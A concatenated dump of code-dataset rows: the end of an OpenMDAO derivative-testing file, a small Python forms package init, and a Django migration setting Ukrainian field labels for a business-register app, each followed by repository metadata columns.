model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1CS(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2CS(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NonlinearBlockGS()
prob.model.linear_solver = om.DirectSolver(assemble_jac=False)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
outs = prob.model.list_outputs(residuals=True, out_stream=None)
for name, meta in outs:
val = np.linalg.norm(meta['resids'])
self.assertLess(val, 1e-8, msg="Check if CS cleans up after itself.")
def test_stepsizes_under_complex_step(self):
import openmdao.api as om
class SimpleComp(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0)
self.add_output('y', val=1.0)
self.declare_partials(of='y', wrt='x', method='cs')
self.count = 0
def compute(self, inputs, outputs):
outputs['y'] = 3.0*inputs['x']
if self.under_complex_step:
# Local cs
if self.count == 0 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for local CS"
raise RuntimeError(msg)
# Global cs with default setting.
if self.count == 1 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for default global CS"
raise RuntimeError(msg)
# Global cs with user setting.
if self.count == 3 and inputs['x'].imag != 1.0e-12:
msg = "Wrong stepsize for user global CS"
raise RuntimeError(msg)
# Check partials cs with default setting forward.
if self.count == 4 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for check partial default CS forward"
raise RuntimeError(msg)
# Check partials cs with default setting.
if self.count == 5 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for check partial default CS"
raise RuntimeError(msg)
# Check partials cs with user setting forward.
if self.count == 6 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for check partial user CS forward"
raise RuntimeError(msg)
# Check partials cs with user setting.
if self.count == 7 and inputs['x'].imag != 1.0e-14:
msg = "Wrong stepsize for check partial user CS"
raise RuntimeError(msg)
self.count += 1
def compute_partials(self, inputs, partials):
partials['y', 'x'] = 3.
prob = om.Problem()
prob.model.add_subsystem('px', om.IndepVarComp('x', val=1.0))
prob.model.add_subsystem('comp', SimpleComp())
prob.model.connect('px.x', 'comp.x')
prob.model.add_design_var('px.x', lower=-100, upper=100)
prob.model.add_objective('comp.y')
prob.setup(force_alloc_complex=True)
prob.run_model()
prob.check_totals(method='cs', out_stream=None)
prob.check_totals(method='cs', step=1e-12, out_stream=None)
prob.check_partials(method='cs', out_stream=None)
prob.check_partials(method='cs', step=1e-14, out_stream=None)
def test_feature_under_complex_step(self):
import openmdao.api as om
class SimpleComp(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0)
self.add_output('y', val=1.0)
self.declare_partials(of='y', wrt='x', method='cs')
def compute(self, inputs, outputs):
outputs['y'] = 3.0*inputs['x']
if self.under_complex_step:
print("Under complex step")
print("x", inputs['x'])
print("y", outputs['y'])
prob = om.Problem()
prob.model.add_subsystem('comp', SimpleComp())
prob.model.add_design_var('comp.x', lower=-100, upper=100)
prob.model.add_objective('comp.y')
prob.setup(force_alloc_complex=True)
prob.run_model()
prob.compute_totals(of=['comp.y'], wrt=['comp.x'])
class ApproxTotalsFeature(unittest.TestCase):
def test_basic(self):
import numpy as np
import openmdao.api as om
class CompOne(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=np.zeros(25))
self._exec_count = 0
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = np.arange(25) * x
self._exec_count += 1
class CompTwo(om.ExplicitComponent):
def setup(self):
self.add_input('y', val=np.zeros(25))
self.add_output('z', val=0.0)
self._exec_count = 0
def compute(self, inputs, outputs):
y = inputs['y']
outputs['z'] = np.sum(y)
self._exec_count += 1
prob = om.Problem()
model = prob.model
model.set_input_defaults('x', 0.0)
model.add_subsystem('comp1', CompOne(), promotes=['x', 'y'])
comp2 = model.add_subsystem('comp2', CompTwo(), promotes=['y', 'z'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup()
prob.run_model()
of = ['z']
wrt = ['x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['z', 'x'], [[300.0]], 1e-6)
self.assertEqual(comp2._exec_count, 2)
def test_basic_cs(self):
import numpy as np
import openmdao.api as om
class CompOne(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=np.zeros(25))
self._exec_count = 0
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = np.arange(25) * x
self._exec_count += 1
class CompTwo(om.ExplicitComponent):
def setup(self):
self.add_input('y', val=np.zeros(25))
self.add_output('z', val=0.0)
self._exec_count = 0
def compute(self, inputs, outputs):
y = inputs['y']
outputs['z'] = np.sum(y)
self._exec_count += 1
prob = om.Problem()
model = prob.model
model.set_input_defaults('x', 0.0)
model.add_subsystem('comp1', CompOne(), promotes=['x', 'y'])
model.add_subsystem('comp2', CompTwo(), promotes=['y', 'z'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='cs')
prob.setup()
prob.run_model()
of = ['z']
wrt = ['x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['z', 'x'], [[300.0]], 1e-6)
def test_arguments(self):
import numpy as np
import openmdao.api as om
class CompOne(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0)
self.add_output('y', val=np.zeros(25))
self._exec_count = 0
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = np.arange(25) * x
self._exec_count += 1
class CompTwo(om.ExplicitComponent):
def setup(self):
self.add_input('y', val=np.zeros(25))
self.add_output('z', val=0.0)
self._exec_count = 0
def compute(self, inputs, outputs):
y = inputs['y']
outputs['z'] = np.sum(y)
self._exec_count += 1
prob = om.Problem()
model = prob.model
model.add_subsystem('comp1', CompOne(), promotes=['x', 'y'])
model.add_subsystem('comp2', CompTwo(), promotes=['y', 'z'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='fd', step=1e-7, form='central', step_calc='rel')
prob.setup()
prob.run_model()
of = ['z']
wrt = ['x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['z', 'x'], [[300.0]], 1e-6)
def test_sellarCS(self):
# Just tests Newton on Sellar with FD derivs.
import openmdao.api as om
from openmdao.test_suite.components.sellar_feature import SellarNoDerivativesCS
prob = om.Problem()
prob.model = SellarNoDerivativesCS()
prob.setup()
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
# Make sure we aren't iterating like crazy
self.assertLess(prob.model.nonlinear_solver._iter_count, 9)
class ParallelFDParametricTestCase(unittest.TestCase):
@parametric_suite(
assembled_jac=[False],
jacobian_type=['dense'],
partial_type=['array'],
partial_method=['fd', 'cs'],
num_var=[3],
var_shape=[(2, 3), (2,)],
connection_type=['explicit'],
run_by_default=True,
)
def test_subset(self, param_instance):
param_instance.linear_solver_class = om.DirectSolver
param_instance.linear_solver_options = {} # defaults not valid for DirectSolver
param_instance.setup()
problem = param_instance.problem
model = problem.model
expected_values = model.expected_values
if expected_values:
actual = {key: problem[key] for key in expected_values}
assert_near_equal(actual, expected_values, 1e-4)
expected_totals = model.expected_totals
if expected_totals:
# Forward Derivatives Check
totals = param_instance.compute_totals('fwd')
assert_near_equal(totals, expected_totals, 1e-4)
# Reverse Derivatives Check
totals = param_instance.compute_totals('rev')
assert_near_equal(totals, expected_totals, 1e-4)
class CheckTotalsParallelGroup(unittest.TestCase):
N_PROCS = 3
def test_vois_in_parallelgroup(self):
class PassThruComp(om.ExplicitComponent):
def initialize(self):
self.options.declare('time', default=3.0)
self.options.declare('size', default=1)
def setup(self):
size = self.options['size']
self.add_input('x', shape=size)
self.add_output('y', shape=size)
self.declare_partials('y', 'x')
def compute(self, inputs, outputs):
waittime = self.options['time']
if not inputs._under_complex_step:
print('sleeping: ')
time.sleep(waittime)
outputs['y'] = inputs['x']
def compute_partials(self, inputs, J):
size = self.options['size']
J['y', 'x'] = np.eye(size)
model = om.Group()
iv = om.IndepVarComp()
size = 1
iv.add_output('x', val=3.0 * np.ones((size, )))
model.add_subsystem('iv', iv)
pg = model.add_subsystem('pg', om.ParallelGroup(), promotes=['*'])
pg.add_subsystem('dc1', PassThruComp(size=size, time=0.0))
pg.add_subsystem('dc2', PassThruComp(size=size, time=0.0))
pg.add_subsystem('dc3', PassThruComp(size=size, time=0.0))
model.connect('iv.x', ['dc1.x', 'dc2.x', 'dc3.x'])
model.add_subsystem('adder', om.ExecComp('z = sum(y1)+sum(y2)+sum(y3)', y1={'value': np.zeros((size, ))},
y2={'value': np.zeros((size, ))},
y3={'value': np.zeros((size, ))}))
model.connect('dc1.y', 'adder.y1')
model.connect('dc2.y', 'adder.y2')
model.connect('dc3.y', 'adder.y3')
model.add_design_var('iv.x', lower=-1.0, upper=1.0)
# this objective works fine
# model.add_objective('adder.z')
# this objective raises a concatenation error whether under fd or cs
# issue 1403
model.add_objective('dc1.y')
# for some reason this constraint is fine even though only lives on proc 3
model.add_constraint('dc3.y', lower=-1.0, upper=1.0)
prob = om.Problem(model=model)
prob.setup(force_alloc_complex=True)
prob.run_model()
data = prob.check_totals(method='cs', out_stream=None)
assert_near_equal(data[('pg.dc1.y', 'iv.x')]['abs error'][0], 0.0, 1e-6)
assert_near_equal(data[('pg.dc3.y', 'iv.x')]['abs error'][0], 0.0, 1e-6)
if __name__ == "__main__":
unittest.main()
| 38.686032
| 115
| 0.556027
| 12,111
| 90,564
| 4.006771
| 0.048386
| 0.05564
| 0.059659
| 0.032972
| 0.865948
| 0.84464
| 0.830318
| 0.816366
| 0.797882
| 0.778243
| 0
| 0.062809
| 0.275176
| 90,564
| 2,340
| 116
| 38.702564
| 0.676432
| 0.032938
| 0
| 0.777707
| 0
| 0
| 0.091984
| 0.003886
| 0
| 0
| 0
| 0
| 0.133629
| 1
| 0.070931
| false
| 0.005067
| 0.021533
| 0
| 0.119696
| 0.021533
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9ce0ea12fe7cd5056e523bed51d1c631b38e66c
| 139
|
py
|
Python
|
app/forms/__init__.py
|
maricio41/homebase
|
5885d533a03b8f6701c5fe21714b39377565d3a0
|
[
"MIT"
] | 2
|
2021-07-01T13:10:59.000Z
|
2021-07-01T13:11:07.000Z
|
app/forms/__init__.py
|
maricio41/homebase
|
5885d533a03b8f6701c5fe21714b39377565d3a0
|
[
"MIT"
] | null | null | null |
app/forms/__init__.py
|
maricio41/homebase
|
5885d533a03b8f6701c5fe21714b39377565d3a0
|
[
"MIT"
] | null | null | null |
from .login_form import LoginForm
from .signup_form import SignUpForm
from .team_form import TeamForm
from .team_form import AddMemberForm
| 27.8
| 36
| 0.856115
| 20
| 139
| 5.75
| 0.5
| 0.347826
| 0.208696
| 0.313043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115108
| 139
| 4
| 37
| 34.75
| 0.934959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d9dfade10b44a59029ca2e8292041251907159ea
| 24,216
|
py
|
Python
|
business_register/migrations/0026_auto_20200724_1927.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
business_register/migrations/0026_auto_20200724_1927.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
business_register/migrations/0026_auto_20200724_1927.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-07-24 19:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('data_ocean', '0006_auto_20200724_1128'),
('business_register', '0025_auto_20200722_1314'),
]
operations = [
migrations.AlterModelOptions(
name='assignee',
options={'verbose_name': 'правонаступник', 'verbose_name_plural': 'правонаступники'},
),
migrations.AlterModelOptions(
name='bylaw',
options={'verbose_name': 'статут'},
),
migrations.AlterModelOptions(
name='company',
options={'verbose_name': 'компанія/організація'},
),
migrations.AlterModelOptions(
name='companydetail',
options={'verbose_name': 'додаткові дані'},
),
migrations.AlterModelOptions(
name='companytokved',
options={'verbose_name': 'КВЕДи компанії'},
),
migrations.AlterModelOptions(
name='companytype',
options={'verbose_name': 'організаційно-правова форма'},
),
migrations.AlterModelOptions(
name='fop',
options={'verbose_name': 'фізична особа-підприємець'},
),
migrations.AlterModelOptions(
name='foptokved',
options={'verbose_name': 'КВЕДи ФОП'},
),
migrations.AlterModelOptions(
name='founder',
options={'verbose_name': 'засновник', 'verbose_name_plural': 'засновники'},
),
migrations.AlterModelOptions(
name='historicalassignee',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical правонаступник'},
),
migrations.AlterModelOptions(
name='historicalcompany',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical компанія/організація'},
),
migrations.AlterModelOptions(
name='historicalcompanydetail',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical додаткові дані'},
),
migrations.AlterModelOptions(
name='historicalfop',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical фізична особа-підприємець'},
),
migrations.AlterModelOptions(
name='historicalfounder',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical засновник'},
),
migrations.AlterModelOptions(
name='historicalsigner',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical має право підпису'},
),
migrations.AlterModelOptions(
name='kved',
options={'verbose_name': 'КВЕД'},
),
migrations.AlterModelOptions(
name='kveddivision',
options={'verbose_name': 'розділ'},
),
migrations.AlterModelOptions(
name='kvedgroup',
options={'verbose_name': 'група'},
),
migrations.AlterModelOptions(
name='kvedsection',
options={'verbose_name': 'секція'},
),
migrations.AlterModelOptions(
name='predecessor',
options={'verbose_name': 'попередник', 'verbose_name_plural': 'попередники'},
),
migrations.AlterModelOptions(
name='signer',
options={'verbose_name': 'має право підпису', 'verbose_name_plural': 'мають право підпису'},
),
migrations.AlterField(
model_name='assignee',
name='company',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='assignees', to='business_register.Company', verbose_name='є правонаступником'),
),
migrations.AlterField(
model_name='assignee',
name='edrpou',
field=models.CharField(max_length=11, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='assignee',
name='name',
field=models.CharField(max_length=610, null=True, verbose_name='правонаступник'),
),
migrations.AlterField(
model_name='bancruptcyreadjustment',
name='reason',
field=models.TextField(null=True, verbose_name='підстава'),
),
migrations.AlterField(
model_name='bylaw',
name='name',
field=models.CharField(max_length=320, null=True, unique=True, verbose_name='статут'),
),
migrations.AlterField(
model_name='company',
name='address',
field=models.CharField(max_length=1000, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='company',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='company',
name='authorized_capital',
field=models.FloatField(null=True, verbose_name='статутний капітал'),
),
migrations.AlterField(
model_name='company',
name='bylaw',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.Bylaw', verbose_name='статут'),
),
migrations.AlterField(
model_name='company',
name='company_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='business_register.CompanyType', verbose_name='організаційно-правова форма'),
),
migrations.AlterField(
model_name='company',
name='contact_info',
field=models.CharField(max_length=310, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='company',
name='edrpou',
field=models.CharField(db_index=True, max_length=260, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='company',
name='name',
field=models.CharField(max_length=500, null=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='company',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='business_register.Company', verbose_name='є підрозділом компанії/організації'),
),
migrations.AlterField(
model_name='company',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='company',
name='registration_info',
field=models.CharField(max_length=450, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='company',
name='short_name',
field=models.CharField(max_length=500, null=True, verbose_name='коротка назва'),
),
migrations.AlterField(
model_name='company',
name='status',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='companytokved',
name='kved',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.Kved', verbose_name='КВЕД'),
),
migrations.AlterField(
model_name='companytokved',
name='primary_kved',
field=models.BooleanField(default=False, verbose_name='зазначений як основний'),
),
migrations.AlterField(
model_name='companytopredecessor',
name='company',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='predecessors', to='business_register.Company', verbose_name='є попередником організації'),
),
migrations.AlterField(
model_name='companytype',
name='name',
field=models.CharField(max_length=270, null=True, unique=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='exchangedatacompany',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='exchangedatafop',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='exchangedatafop',
name='fop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='exchange_data', to='business_register.Fop', verbose_name='ФОП'),
),
migrations.AlterField(
model_name='exchangedatafop',
name='taxpayer_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='data_ocean.TaxpayerType', verbose_name='тип платника податків'),
),
migrations.AlterField(
model_name='fop',
name='address',
field=models.CharField(max_length=500, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='fop',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='fop',
name='contact_info',
field=models.CharField(max_length=200, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='fop',
name='fullname',
field=models.CharField(max_length=100, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='fop',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='fop',
name='registration_info',
field=models.CharField(max_length=300, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='fop',
name='status',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='foptokved',
name='fop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='kveds', to='business_register.Fop', verbose_name='ФОП'),
),
migrations.AlterField(
model_name='foptokved',
name='kved',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.Kved', verbose_name='КВЕД'),
),
migrations.AlterField(
model_name='foptokved',
name='primary_kved',
field=models.BooleanField(default=False, verbose_name='зазначений як основний'),
),
migrations.AlterField(
model_name='founder',
name='address',
field=models.CharField(max_length=2015, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='founder',
name='company',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='founders', to='business_register.Company', verbose_name='є засновником компанії/організації'),
),
migrations.AlterField(
model_name='founder',
name='edrpou',
field=models.CharField(max_length=9, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='founder',
name='equity',
field=models.FloatField(null=True, verbose_name='участь в статутному капіталі'),
),
migrations.AlterField(
model_name='founder',
name='info',
field=models.CharField(max_length=2015, verbose_name='наявні дані'),
),
migrations.AlterField(
model_name='founder',
name='name',
field=models.TextField(null=True, verbose_name="назва/повне ім'я"),
),
migrations.AlterField(
model_name='historicalassignee',
name='company',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Company', verbose_name='є правонаступником'),
),
migrations.AlterField(
model_name='historicalassignee',
name='edrpou',
field=models.CharField(max_length=11, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='historicalassignee',
name='name',
field=models.CharField(max_length=610, null=True, verbose_name='правонаступник'),
),
migrations.AlterField(
model_name='historicalcompany',
name='address',
field=models.CharField(max_length=1000, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='historicalcompany',
name='authority',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='historicalcompany',
name='authorized_capital',
field=models.FloatField(null=True, verbose_name='статутний капітал'),
),
migrations.AlterField(
model_name='historicalcompany',
name='bylaw',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Bylaw', verbose_name='статут'),
),
migrations.AlterField(
model_name='historicalcompany',
name='company_type',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.CompanyType', verbose_name='організаційно-правова форма'),
),
migrations.AlterField(
model_name='historicalcompany',
name='contact_info',
field=models.CharField(max_length=310, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='historicalcompany',
name='edrpou',
field=models.CharField(db_index=True, max_length=260, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='historicalcompany',
name='name',
field=models.CharField(max_length=500, null=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='historicalcompany',
name='parent',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Company', verbose_name='є підрозділом компанії/організації'),
),
migrations.AlterField(
model_name='historicalcompany',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='historicalcompany',
name='registration_info',
field=models.CharField(max_length=450, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='historicalcompany',
name='short_name',
field=models.CharField(max_length=500, null=True, verbose_name='коротка назва'),
),
migrations.AlterField(
model_name='historicalcompany',
name='status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='historicalfop',
name='address',
field=models.CharField(max_length=500, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='historicalfop',
name='authority',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='historicalfop',
name='contact_info',
field=models.CharField(max_length=200, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='historicalfop',
name='fullname',
field=models.CharField(max_length=100, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='historicalfop',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='historicalfop',
name='registration_info',
field=models.CharField(max_length=300, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='historicalfop',
name='status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='historicalfounder',
name='address',
field=models.CharField(max_length=2015, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='historicalfounder',
name='company',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Company', verbose_name='є засновником компанії/організації'),
),
migrations.AlterField(
model_name='historicalfounder',
name='edrpou',
field=models.CharField(max_length=9, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='historicalfounder',
name='equity',
field=models.FloatField(null=True, verbose_name='участь в статутному капіталі'),
),
migrations.AlterField(
model_name='historicalfounder',
name='info',
field=models.CharField(max_length=2015, verbose_name='наявні дані'),
),
migrations.AlterField(
model_name='historicalfounder',
name='name',
field=models.TextField(null=True, verbose_name="назва/повне ім'я"),
),
migrations.AlterField(
model_name='historicalsigner',
name='name',
field=models.CharField(max_length=390, null=True, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='kved',
name='code',
field=models.CharField(max_length=10, verbose_name='код'),
),
migrations.AlterField(
model_name='kved',
name='division',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedDivision', verbose_name='розділ'),
),
migrations.AlterField(
model_name='kved',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedGroup', verbose_name='група'),
),
migrations.AlterField(
model_name='kved',
name='is_valid',
field=models.BooleanField(default=True, verbose_name='є чинним'),
),
migrations.AlterField(
model_name='kved',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='kved',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedSection', verbose_name='секція'),
),
migrations.AlterField(
model_name='kveddivision',
name='code',
field=models.CharField(max_length=10, unique=True, verbose_name='код'),
),
migrations.AlterField(
model_name='kveddivision',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='kveddivision',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedSection', verbose_name='секція'),
),
migrations.AlterField(
model_name='kvedgroup',
name='code',
field=models.CharField(max_length=10, unique=True, verbose_name='код'),
),
migrations.AlterField(
model_name='kvedgroup',
name='division',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedDivision', verbose_name='розділ'),
),
migrations.AlterField(
model_name='kvedgroup',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='kvedgroup',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedSection', verbose_name='секція'),
),
migrations.AlterField(
model_name='kvedsection',
name='code',
field=models.CharField(max_length=10, unique=True, verbose_name='код'),
),
migrations.AlterField(
model_name='kvedsection',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='predecessor',
name='edrpou',
field=models.CharField(max_length=405, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='predecessor',
name='name',
field=models.CharField(max_length=500, null=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='signer',
name='name',
field=models.CharField(max_length=390, null=True, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='terminationstarted',
name='reason',
field=models.TextField(null=True, verbose_name='підстава'),
),
]
| 43.632432
| 229
| 0.605261
| 2,290
| 24,216
| 6.219651
| 0.08952
| 0.089588
| 0.159728
| 0.185284
| 0.875728
| 0.858176
| 0.786843
| 0.760935
| 0.754757
| 0.750263
| 0
| 0.009889
| 0.269202
| 24,216
| 554
| 230
| 43.711191
| 0.794937
| 0.001858
| 0
| 0.857664
| 1
| 0
| 0.20609
| 0.029625
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00365
| 0
| 0.009124
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8a509dd7207a5255829a2614b9166b8eb4d97549
| 213
|
py
|
Python
|
docsexp/__init__.py
|
AgentDS/DocsExp
|
